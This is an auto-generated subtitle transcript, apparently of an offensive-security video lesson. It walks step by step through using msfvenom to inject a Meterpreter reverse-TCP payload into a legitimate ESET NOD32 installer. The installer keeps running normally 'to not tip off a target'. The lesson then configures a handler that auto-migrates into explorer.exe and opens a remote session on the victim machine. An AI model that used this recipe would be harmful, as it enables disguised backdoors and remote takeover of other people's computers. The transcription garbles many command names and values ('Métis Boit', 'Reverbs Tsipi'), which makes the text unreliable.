1
00:00:00,670 --> 00:00:09,490
So typically when MSRA Venom runs, the payload is embedded into the default executable template at

2
00:00:09,970 --> 00:00:13,630
data template template Dot Yuxi.

3
00:00:14,810 --> 00:00:21,590
Although this template is changed on occasion, antivirus vendors still look for it when building signatures.

4
00:00:22,010 --> 00:00:30,050
However, MSF venom supports the use of any Windows executable in place of the default executable template.

5
00:00:31,150 --> 00:00:37,990
The important point here is you should take very good care about not disturbing the usage experience

6
00:00:37,990 --> 00:00:43,720
of this system, owner or user, and the best part about it is it's extremely simple.

7
00:00:44,470 --> 00:00:48,820
So why don't we embed Métis Boit payload in an executable?

8
00:00:49,790 --> 00:00:56,540
First off, you're going to need a Windows executable file so you can either download or use what you

9
00:00:56,540 --> 00:00:57,290
have already.

10
00:00:58,280 --> 00:01:06,160
So I'm just going to download the ESET Nöjd 32 initial download or file to embed the payload.

11
00:01:06,890 --> 00:01:10,190
So open up your browser and go to the ESET website.

12
00:01:11,080 --> 00:01:12,400
If you scroll down a little bit.

13
00:01:13,350 --> 00:01:14,900
Click on the download button.

14
00:01:15,770 --> 00:01:21,590
And it will redirect you to a download page, click on the download link and save the file.

15
00:01:23,470 --> 00:01:30,580
Now open and terminal and then type in MSF Venom P Windows interpretor.

16
00:01:32,160 --> 00:01:33,750
Reverbs Tsipi.

17
00:01:34,950 --> 00:01:42,000
Almost equals 10, 10 to 11, an airport equals four, four, four, three.

18
00:01:43,020 --> 00:01:44,190
Platform is Windows.

19
00:01:45,500 --> 00:01:47,030
Architecture, 32 bit.

20
00:01:48,160 --> 00:01:50,470
File tape will be Windows executable.

21
00:01:51,500 --> 00:02:00,990
No encoding and iteration then acts to specify a custom executable file to use as a template.

22
00:02:01,790 --> 00:02:11,360
So in my case, it is ESET nod to antivirus Leive installer and OK to preserve the template file behavior

23
00:02:11,930 --> 00:02:15,110
and inject the payload as a new threat.

24
00:02:16,150 --> 00:02:18,400
So now let's give a name to the output file.

25
00:02:19,250 --> 00:02:23,720
And I'll use the same name, as you said, not 32.

26
00:02:25,340 --> 00:02:27,440
So the files generated LRC.

27
00:02:28,630 --> 00:02:37,510
And it's here in the malware directory and let's see the result of the final command, so it's a 32

28
00:02:37,510 --> 00:02:39,590
bit GUI Windows executable.

29
00:02:40,300 --> 00:02:47,710
Now, for the most part, when a targeted user launches a back door executable like this, if nothing

30
00:02:47,710 --> 00:02:50,900
appears to happen, it can raise suspicions.

31
00:02:51,370 --> 00:02:59,050
So to improve your chances of not tipping off a target, you can launch a payload while simultaneously

32
00:02:59,050 --> 00:03:03,340
continuing normal execution of the launched application.

33
00:03:04,540 --> 00:03:08,860
But for now, you just embed the payload into an executable template.

34
00:03:09,520 --> 00:03:09,970
All right.

35
00:03:09,970 --> 00:03:13,030
So now you're going to need a handler.

36
00:03:13,630 --> 00:03:18,740
So open MSF consul and the handler template is already chosen.

37
00:03:19,330 --> 00:03:20,860
Show me the options.

38
00:03:21,860 --> 00:03:28,730
And there's nothing to change except airport, so said airport two four, four, four, three.

39
00:03:29,640 --> 00:03:36,630
But you're going to need to set another variable also, so as soon as the user launches the malware,

40
00:03:36,990 --> 00:03:39,320
you need to jump to another reliable process.

41
00:03:39,900 --> 00:03:46,370
So let's see, in our case, you're going to do this, but you can also do something else.

42
00:03:47,370 --> 00:03:48,990
So show advanced.

43
00:03:49,840 --> 00:03:53,380
And here's a variable auto run script.

44
00:03:54,760 --> 00:04:01,960
So this variable specifies what to do first if the exploitation is accomplished.

45
00:04:02,470 --> 00:04:08,020
So in other words, in this particular scenario, you're going to need to migrate a reliable process.

46
00:04:08,440 --> 00:04:12,490
So then that means set auto run script to.

47
00:04:13,400 --> 00:04:18,140
Post windows, manage my great.

48
00:04:19,410 --> 00:04:30,720
With the parameters name equals explorer dot XY and spawn equals false.

49
00:04:31,380 --> 00:04:37,250
So then after exploitation, the script will run and migrate to explore XY.

50
00:04:38,310 --> 00:04:41,070
OK then let's hit Exploit J.

51
00:04:42,110 --> 00:04:44,120
Go back over to Métis Portable three.

52
00:04:45,880 --> 00:04:49,390
Refresh the page and then download it and save it.

53
00:04:49,420 --> 00:04:52,150
You said not 30 to file to the desktop.

54
00:04:53,870 --> 00:04:57,590
And there's the fire, so let's double click it and launch it.

55
00:04:59,440 --> 00:05:05,620
So did you see that this session open and immediately upon opening the session, the post module is

56
00:05:05,620 --> 00:05:10,840
executed, so there we have it, we've successfully migrated to explore.

57
00:05:11,800 --> 00:05:13,060
So sessions.

58
00:05:14,430 --> 00:05:16,080
Interact with Section five.

59
00:05:17,430 --> 00:05:20,100
Get Eweida this info.

60
00:05:21,030 --> 00:05:24,270
And yes, this is what you want.

61
00:05:25,720 --> 00:05:28,750
Now, unless a user closes the computer.

62
00:05:29,680 --> 00:05:31,600
You can move around anywhere you want.